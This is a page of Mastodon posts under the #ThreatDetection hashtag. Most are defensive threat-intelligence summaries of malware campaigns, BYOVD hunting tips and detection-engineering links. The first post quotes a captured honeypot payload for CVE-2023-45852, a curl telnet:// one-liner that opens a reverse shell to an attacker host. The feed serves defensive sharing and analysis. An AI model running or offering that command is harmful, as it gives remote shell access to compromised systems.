Okla.Social

2 posts2 participants0 posts today

Niels HeinenFirst time I'm seeing curl being used with telnet:// to fetch a payload. Found in an exploitation of CVE-2023-45852C='curl -Ns telnet://x.x.x.x:4444'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null<a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#dfir</a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://infosec.exchange/tags/exploit" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#exploit</a> <a href="https://infosec.exchange/tags/honeypot" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#honeypot</a> <a href="https://infosec.exchange/tags/threatdetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#threatdetection</a>

Tedi HeriyantoThe AI-Powered Detection Engineer: <a href="https://www.detectionatscale.com/p/the-ai-powered-detection-engineer" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.detectionatscale.com/p/the-ai-powered-detection-engineer</a><a href="https://infosec.exchange/tags/threatdetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#threatdetection</a> <a href="https://infosec.exchange/tags/AIpowered" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#AIpowered</a>

Josh Lemon<a href="https://infosec.exchange/tags/BYOVD" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#BYOVD</a> attacks are slowly becoming more common for threat actors to escalate privilege and kill security tools. Make sure you're <a href="https://infosec.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatHunting</a> for new Vulnerable Drivers! Win 11 now has a Vulnerable Driver Blocklist feature, however, it's only updated in major updates so you still need to monitor for recently discovered Vulnerable Drivers.Recent Vuln Driver: <a href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-exploit-paragon-partition-manager-bug-in-byovd-attacks/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.bleepingcomputer.com/news/security/ransomware-gangs-exploit-paragon-partition-manager-bug-in-byovd-attacks/</a>Known Vuln Drivers: <a href="https://www.loldrivers.io/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.loldrivers.io/</a>Vuln Driver Blocklist: <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules</a><a href="https://infosec.exchange/tags/IncidentResponse" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#IncidentResponse</a> <a href="https://infosec.exchange/tags/ransomware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ransomware</a> <a href="https://infosec.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a>

Just Another Blue TeamerGood day everyone!An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used an age-old technique of spear-phishing to gain initial access that had various attachments that would contain the legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!Angry Likho: Old beasts in a new forest <a href="https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/</a>Intel 471 Cyborg Security, Now Part of Intel 471 <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatIntel</a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatHunting</a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a> <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HappyHunting</a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#readoftheday</a>

Just Another Blue TeamerGood day everyone!Fortinet's FortiGuard Labs discovered a new variant of the <a href="https://ioc.exchange/tags/Snake" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Snake</a> keylogger, a.k.a. "404 Keylogger". According to the report most of the detections from their "FortiSandbox" have come from China, Turkey, Indonesia, Taiwan, and Spain but if you aren't from these countries, you still may be a target! Behaviors (MITRE ATT&CK): Persistence - TA0003: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - After the malware is executed and drops a copy of itself in the %Local_AppData%\supergroup directory then copies itself the the %Startup% folder. Defense Evasion - TA0005: Process Injection: Process Hollowing T1055.012 - The malware injects itself into a legitimate .NET process, in this sample it was RegSvcs.exe. This allowed it to run within a trusted process to evade detection.Command And Control - TA0011: Application Layer Protocol: Web Protocols - T1071.001 Application Layer Protocol: Mail Protocols - T1071.003The malware used multiple techniques to upload stolen credentials. The researchers observed SMTP, Telegram bots, and HTTP Post requests to transmit the data.As usual, go check out the research for yourself to check out the details that I left out and support the good work! Enjoy and Happy Hunting!FortiSandbox 5.0 Detects Evolving Snake Keylogger Variant <a href="https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant</a>Intel 471 Cyborg Security, Now Part of Intel 471 <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatIntel</a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatHunting</a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a> <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HappyHunting</a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#readoftheday</a>

Anthony KraudeltCyber threats are more sophisticated than ever, making it critical for businesses to stay ahead of potential attacks. Not knowing, or thinking ignorance is bliss, isn't an option. Cyber Threat Intelligence (CTI) empowers organizations with the insights needed to identify, analyze, and mitigate risks before they cause significant damage.By leveraging CTI, businesses can proactively detect vulnerabilities, understand emerging threats, and anticipate attack patterns. Instead of reacting to breaches after they occur, organizations can take a proactive approach—strengthening security measures, reducing downtime, and minimizing financial and reputational losses.To maximize CTI’s effectiveness, companies should integrate threat intelligence into their security operations, incident response, and risk management strategies. Automated security tools, such as SIEM and threat intelligence platforms, can help correlate CTI data with real-time network activity, enabling faster threat detection and response. Additionally, collaborating with industry peers and sharing intelligence enhances collective defense against cyber adversaries.Staying informed and prepared is not optional—it’s a necessity. Cyber Threat Intelligence helps businesses stay one step ahead of attackers, ensuring a stronger, more resilient security posture. Invest in CTI to protect your company’s future.<a href="https://infosec.exchange/tags/CyberThreatIntelligence" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CyberThreatIntelligence</a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CyberSecurity</a> <a href="https://infosec.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a> <a href="https://infosec.exchange/tags/ProactiveDefense" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ProactiveDefense</a>

Just Another Blue TeamerGood day everyone, new Blizzard has dropped!Microsoft's Threat Intelligence shares their research on a Russian state actor dubbed <a href="https://ioc.exchange/tags/SeashellBlizzard" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#SeashellBlizzard</a>! Part of the GRU, they specialize in operations from espionage to information operation and cyber-enabled disruptions which have resulted in destructive attacks and manipulation of ICS. They have leveraged different types of malware to include <a href="https://ioc.exchange/tags/KillDisk" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#KillDisk</a>, <a href="https://ioc.exchange/tags/FoxBlade" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#FoxBlade</a>, and <a href="https://ioc.exchange/tags/NotPetya" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#NotPetya</a>. Behavior Summary (With MITRE ATT&CK): Initial Access - TA0001: Exploit Public-Facing Application - T1190 Seashell Blizzard commonly exploited vulnerable public facing infrastructure. Persistence - TA0003: Create or Modify System Process: Windows Service - T1543.003 - Among other means of persistence, Seashell Blizzard created a system service.Execution - TA0002: Command and Scripting Interpreter: PowerShell - T1059.001 Command and Scripting Interpreter: Windows Command Shell - T1059.003 Seashell Blizzard abused both of these living off the land binaries for multiple reasons and using multiple different parameters. As always, there is WAAAAY too many technical details here, so go check it out yourself! Enjoy the read and Happy Hunting!The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation <a href="https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/</a>Intel 471 Cyborg Security, Now Part of Intel 471 <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatIntel</a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatHunting</a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a> <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HappyHunting</a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#readoftheday</a>

Josh LemonJoin me for SANS Institute <a href="https://infosec.exchange/tags/Perth" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Perth</a> Community Night today!📋 Registration Thrus, 13 Feb 2025 5:30pm – 6pm🎤 Presentation 6pm – 7pmRegister Here: <a href="https://www.sans.org/mlp/community-night-perth-february-2025/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.sans.org/mlp/community-night-perth-february-2025/</a>📍The Pan Pacific Perth Hotel, 207 Adelaide Terrace, Perth WA 6000I'll be presenting a review of the SANS 2024 Detection & Response Survey I authored last year. It should be a fun and casual presentation on the current state of <a href="https://infosec.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a> and <a href="https://infosec.exchange/tags/IncidentResponse" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#IncidentResponse</a> in our industry.<a href="https://infosec.exchange/tags/AI" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#AI</a> <a href="https://infosec.exchange/tags/DFIR" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#DFIR</a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CyberSecurity</a> <a href="https://infosec.exchange/tags/SOC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#SOC</a>

Tedi HeriyantoDetection Engineering with SIGMA Rules!: <a href="https://youtu.be/vnlF4nZ2AL4" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://youtu.be/vnlF4nZ2AL4</a><a href="https://infosec.exchange/tags/detectionengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#detectionengineering</a> <a href="https://infosec.exchange/tags/threatdetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#threatdetection</a> <a href="https://infosec.exchange/tags/sigma" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#sigma</a>

Tedi HeriyantoSigma Rules: Your Guide to Threat Detection’s Open Standard: <a href="https://panther.com/blog/your-guide-to-the-sigma-rules-open-standard-for-threat-detection" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://panther.com/blog/your-guide-to-the-sigma-rules-open-standard-for-threat-detection</a><a href="https://infosec.exchange/tags/siem" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#siem</a> <a href="https://infosec.exchange/tags/sigma" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#sigma</a> <a href="https://infosec.exchange/tags/logfiles" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#logfiles</a> <a href="https://infosec.exchange/tags/threatdetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#threatdetection</a>

Kunai Project🚀 Kunai pushes further integration with MISP!This week, we've made significant progress in bridging Kunai with <a href="https://misp-community.org/@misp" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@misp</a> to enhance threat intelligence sharing. Our focus has been on developing kunai-to-misp, a new tool available at <a href="https://github.com/kunai-project/pykunai" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://github.com/kunai-project/pykunai</a>, which processes Kunai logs and creates MISP events to streamline collaboration.With this, it is now possible to both update MISP from Kunai and feed Kunai from MISP using the misp-to-kunai tool. Here's a practical workflow example:1️⃣ Analyze a <a href="https://infosec.exchange/tags/linux" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#linux</a> malware sample with Kunai Sandbox (<a href="https://github.com/kunai-project/sandbox" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://github.com/kunai-project/sandbox</a>) 2️⃣ Use kunai-to-misp on the collected Kunai logs 3️⃣ (Optional) Review attributes' IDS flag to maximize detections and reduce false positives 4️⃣ Use misp-to-kunai to distribute the results across all Kunai endpointsAdditionally, we're leveraging MISP’s data model to craft meaningful MISP objects and relationships, offering a clear visual representation of events inside MISP.🔗 Try it out and let us know what you think!<a href="https://infosec.exchange/tags/opensource" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#opensource</a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#threatintel</a> <a href="https://infosec.exchange/tags/threatdetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#threatdetection</a> <a href="https://infosec.exchange/tags/cyberdefense" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#cyberdefense</a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#dfir</a> <a href="https://infosec.exchange/tags/detectionengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#detectionengineering</a>

Just Another Blue TeamerHappy Wednesday everyone!The <a href="https://ioc.exchange/tags/AsyncRAT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#AsyncRAT</a> is made headlines in a report published by the Forcepoint X-Labs research team. A significant finding was that the malware leveraged payloads delivered through suspicious TryCloudflare quick tunnels and Python packages. While I am familiar with Python packages being weaponized during a supply chain attack, the topic of quick tunnels eluded me. So, I looked it up and found that "Developers can use the TryCloudflare tool to experiment with Cloudflare Tunnel without adding a site to Cloudflare's DNS. TryCloudflare will launch a process that generates a random subdomain on trycloudflare.com. Requests to that subdomain will be proxied through the Cloudflare network to your web server running on localhost." [<a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/</a>] This was interesting as it seemed to be a workaround or possibly a replacement for domain generating algorithms (DGAs). And if I am misunderstanding this technology, someone please enlighten me! Behaviors: Initial Access: Phishing: Spearphising Link - T1566.002Execution: Command And Scripting Interpreter: JavaScript - T1059.007 - A javascript was executed after an LNK file was delivered and executed and links to a .BAT file. Command And Scripting Interpreter: Windows Command Shell - T1059.003 - A .BAT file is executed that leads to another zip file that contains a python script used to execute the AsyncRAT malware.Command And Scripting Interpreter: Python - T1059.006 - A python file is used to execute the AsyncRAT malware. As usual, go show the authors some love and check out the details I excluded and get hunting on those behaviors! Enjoy and Happy Hunting!AsyncRAT Reloaded: Using Python and TryCloudflare for Malware Delivery Again <a href="https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware</a>Intel 471 Cyborg Security, Now Part of Intel 471 <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatIntel</a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatHunting</a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a> <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HappyHunting</a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#readoftheday</a>

Just Another Blue TeamerHappy Monday everyone!Fortinet researchers provide us with some very helpful threat intel involving the <a href="https://ioc.exchange/tags/Coyote" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Coyote</a> banking trojan that has been used in attacks targeting users in Brazil looking for sensitive information. This trojan has many capabilities which include keylogging, capturing screenshots, and can display phishing overlays to steal sensitive credentials. Behavior Summary:Persistence: During the attack, the Windows Run Registry key is created to provide a persistence mechanism. MITRE ATT&CK ID: T1547.001Execution:The LNK file contains malicious PowerShell commands that reach out to C2 servers AND it is used later in the attack. MITRE ATT&CK ID: T1059.001Discovery:The antivirus is queried on the compromised system using WMI (Windows Management Instrumentation). MITRE ATT&CK ID: T1518.001.As usual, I left out a bunch of details for you to go check out in the article, so show the authors some love and enjoy the read! Happy Hunting!Coyote Banking Trojan: A Stealthy Attack via LNK Files<a href="https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files</a>Intel 471 Cyborg Security, Now Part of Intel 471 <a href="https://ioc.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatIntel</a> <a href="https://ioc.exchange/tags/ThreatHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatHunting</a> <a href="https://ioc.exchange/tags/ThreatDetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ThreatDetection</a> <a href="https://ioc.exchange/tags/HappyHunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HappyHunting</a> <a href="https://ioc.exchange/tags/readoftheday" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#readoftheday</a>

Niels HeinenCan someone confirm, is this exploitation of CVE-2023-22522 ? First time seeing this today so I will create proper rules in Lophiid to start interaction with future exploitation attempts<a href="https://infosec.exchange/tags/honeypot" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#honeypot</a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://infosec.exchange/tags/threatdetection" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#threatdetection</a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#dfir</a>

Recent searches

Search options

Administered by:

Server stats:

#ThreatDetection